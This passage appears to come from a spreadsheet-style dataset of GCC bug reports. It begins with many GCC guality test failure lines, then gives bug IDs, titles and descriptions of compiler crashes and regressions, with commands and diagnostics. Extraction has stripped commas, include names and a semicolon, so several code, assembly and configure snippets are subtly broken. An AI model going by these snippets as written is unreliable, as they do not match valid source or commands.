FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -fomit-frame-pointer  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O3 -g  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -Os  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O1  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O2  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -fomit-frame-pointer  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -O3 -g  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-3.c  -Os  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O1  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O2  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -fomit-frame-pointer  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -O3 -g  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 14 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 14 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 14 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 14 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 14 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 14 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 14 arg7 == 30
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-4.c  -Os  line 16 arg7 == 30
Revision 195220 is OK.</t>
  </si>
  <si>
    <t>GCC-26717</t>
  </si>
  <si>
    <t>[4.2 Regression] complex/complex gives a REAL_CST</t>
  </si>
  <si>
    <t>Hi
compiling LAPACK with -O -ffast-math leads to an ICE
in LAPACK's csptri.f and csytri.f:
% gfortran -O -ffast-math -c csptri.f
csptri.f: In function 'csptri':
csptri.f:1: internal compiler error: in find_lattice_value at tree-complex.c:133
The same error is encountered in the other file.
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-26447</t>
  </si>
  <si>
    <t>[4.2 Regression] verify_flow_info failed load PRE with java program</t>
  </si>
  <si>
    <t>verify_flow_info tripped an internal error.
OK with -O1 but not with -O2
[aph@zorro tmp]$ /home/aph/install/bin/gcj -c -O1 -g -fPIC -findirect-dispatch -fjni AbstractCommentParser.class
[aph@zorro tmp]$ /home/aph/install/bin/gcj -c -O2 -g -fPIC -findirect-dispatch -fjni AbstractCommentParser.class
org/eclipse/jdt/internal/compiler/parser/AbstractCommentParser.java: In class 'org.eclipse.jdt.internal.compiler.parser.AbstractCommentParser':
org/eclipse/jdt/internal/compiler/parser/AbstractCommentParser.java: In method 'org.eclipse.jdt.internal.compiler.parser.AbstractCommentParser.commentParse()':
org/eclipse/jdt/internal/compiler/parser/AbstractCommentParser.java:0: error: control flow in the middle of basic block 32
org/eclipse/jdt/internal/compiler/parser/AbstractCommentParser.java:0: error: control flow in the middle of basic block 32
org/eclipse/jdt/internal/compiler/parser/AbstractCommentParser.java:0: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-26635</t>
  </si>
  <si>
    <t>[4.3/4.4 regression] bogus Storage_Error warning</t>
  </si>
  <si>
    <t>The patch
2006-01-09  Kazu Hirata  
	PR tree-optimization/25125
	* convert.c (convert_to_integer): Don't narrow the type of a
	PLUX_EXPR or MINUS_EXPR if !flag_wrapv and the unwidened type
	is signed.
has introduced a regression for the Ada testcase that I'm about to attach:
eric@linux:~/gnat/bugs/F217-005&gt; gcc -S p.ads
p.ads:12:03: warning: Storage_Error will be raised at run-time
The testcase should compile silently.
Analysis: http://gcc.gnu.org/ml/gcc-patches/2006-03/msg00198.html
I think Kazu's original patch was the correct fix.</t>
  </si>
  <si>
    <t>GCC-13031</t>
  </si>
  <si>
    <t>[3.3 regression] ICE (unrecognizable insn) when building gnome-libs-1.4.2</t>
  </si>
  <si>
    <t>This is using a snapshot of the 3.3.2 branch from 2003/10/22.  Here is the
output from gcc -v:
Reading specs from /usr/lib/gcc-lib/alphaev67-unknown-linux-gnu/3.3.2/specs
Configured with: /usr/local/tmp/portage/gcc-3.3.2-r2/work/gcc-3.3.2/configure
--prefix=/usr --bindir=/usr/alphaev67-unknown-linux-gnu/gcc-bin/3.3
--includedir=/usr/lib/gcc-lib/alphaev67-unknown-linux-gnu/3.3.2/include
--datadir=/usr/share/gcc-data/alphaev67-unknown-linux-gnu/3.3
--mandir=/usr/share/gcc-data/alphaev67-unknown-linux-gnu/3.3/man
--infodir=/usr/share/gcc-data/alphaev67-unknown-linux-gnu/3.3/info
--enable-shared --host=alphaev67-unknown-linux-gnu
--target=alphaev67-unknown-linux-gnu --with-system-zlib
--enable-languages=cc++f77objc --enable-threads=posix --enable-long-long
--disable-checking --enable-cstdio=stdio --enable-clocale=generic
--enable-__cxa_atexit --enable-version-specific-runtime-libs
--with-gxx-include-dir=/usr/lib/gcc-lib/alphaev67-unknown-linux-gnu/3.3.2/include/g++-v3
--with-local-prefix=/usr/local --enable-shared --enable-nls
--without-included-gettext --disable-multilib
Thread model: posix
gcc version 3.3.2 20031022 (Gentoo Linux 3.3.2-r2 propolice)
Here is the command-line and messages:
gcc -DHAVE_CONFIG_H -I. -I. -I.. -I.. -I./.. -DNEED_GNOMESUPPORT_H -I../support
-I../support -I../intl -I../intl -I/usr/include -I/usr/include/gtk-1.2
-I/usr/include/glib-1.2 -I/usr/lib/glib/include -I/usr/X11R6/include
-I/usr/X11R6/include -DGNOMELIBDIR=\/usr/lib\ -DGNOMEDATADIR=\/usr/share\
-DGNOMEBINDIR=\/usr/bin\ -DGNOMELOCALSTATEDIR=\/var/lib\
-DGNOMELOCALEDIR=\/usr/share/locale\ -DG_LOG_DOMAIN=\GnomeUI\
-I/usr/include/gtk-1.2 -I/usr/include/glib-1.2 -I/usr/lib/glib/include
-I/usr/X11R6/include -mcpu=ev67 -O3 -pipe -mieee -I/usr/include/db1 -Wall
-Wunused -c gnome-icon-list.c  -fPIC -DPIC -o .libs/gnome-icon-list.lo
gnome-icon-list.c: In function `gnome_icon_list_unselect_all':
gnome-icon-list.c:499: error: unrecognizable insn:
(insn 265 166 266 14 0x2000096d868 (set (reg:DI 2 $2)
        (eq:DI (const_int 0 [0x0])
            (const_int 0 [0x0]))) -1 (nil)
    (nil))
gnome-icon-list.c:499: internal compiler error: in extract_insn at recog.c:2175
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into
/usr/local/tmp/portage/gnome-libs-1.4.2/temp/ccbtmqSM.out file please attach
this to your bugreport
I will attached the preprocessed source.</t>
  </si>
  <si>
    <t>agriffis</t>
  </si>
  <si>
    <t>GCC-69657</t>
  </si>
  <si>
    <t>[6 Regression] abs() not inlined after including math.h</t>
  </si>
  <si>
    <t>Since a recent C++ header change abs() no longer gets inlined if we include an unrelated header before it.
#include 
#include 
int
wrap_abs (int x)
{
  return abs (x) + std::abs(x)
}
Until recently GCC6 with -O2 -S produced for AArch64:
_Z8wrap_absi:
	cmp	w0 wzr
	csneg	w0 w0 w0 ge
	lsl	w0 w0 1
	ret
However trunk GCC6 now emits:
_Z8wrap_absi:
	stp	x29 x30 [sp -16]!
	add	x29 sp 0
	bl	abs
	lsl	w0 w0 1
	ldp	x29 x30 [sp] 16
This may result in significant slowdowns as it adds a call and PLT indirection to execute a 3-instruction function. There might be other builtin functions that are affected in a similar way.</t>
  </si>
  <si>
    <t>wdijkstr</t>
  </si>
  <si>
    <t>GCC-29030</t>
  </si>
  <si>
    <t>gcc.dg/array-9.c produces internal compiler error on Darwin at -m64</t>
  </si>
  <si>
    <t>The gcc.dg/array-9.c testcase results in an internal compiler error on powerpc-apple-darwin8 when compiled at -m64.
gcc-4 -O3 -m64 array-9.c
array-9.c:7: error: declaration of 'x' as array of voids
array-9.c: In function 'foo':
array-9.c:10: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in rs6000_darwin64_record_arg_advance_recurse at config/rs6000/rs6000.c:4610
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gcc-4 -v 
Using built-in specs.
Target: powerpc-apple-darwin8
Configured with: ../gcc-4.2-20060910/configure --prefix=/sw --prefix=/sw/lib/gcc4 --enable-languages=cc++fortran --infodir=/sw/lib/gcc4/share/info --with-gmp=/sw --with-included-gettext --host=powerpc-apple-darwin8 --with-libiconv-prefix=/sw</t>
  </si>
  <si>
    <t>GCC-44065</t>
  </si>
  <si>
    <t>[OOP] Undefined reference to vtab$...</t>
  </si>
  <si>
    <t>In the following testcase (tested against 4.6) a procedure bound to an attribute of a super class is not resolved in the subclass.
